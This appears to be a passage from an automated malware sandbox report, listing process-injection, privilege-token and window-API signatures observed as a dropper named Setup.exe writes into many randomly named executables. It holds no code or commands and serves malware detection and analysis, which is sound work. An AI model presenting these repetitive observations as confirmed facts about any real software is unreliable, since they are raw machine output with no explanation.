N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe
PID 1468 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe
PID 1468 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe
PID 1468 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe
PID 1468 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe
PID 1468 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe
PID 1468 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe
PID 1468 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe
PID 1468 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe
PID 1468 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe
PID 1468 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe
PID 1468 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe
PID 1468 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1468 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1468 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1468 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe
PID 1468 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe
PID 1468 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe
PID 1468 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe
PID 1468 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe
PID 1468 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe
PID 1468 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe
PID 1468 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe
PID 1468 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe
PID 1468 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe
PID 1468 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe
PID 1468 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe
PID 1468 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe
PID 1468 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe
PID 1468 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
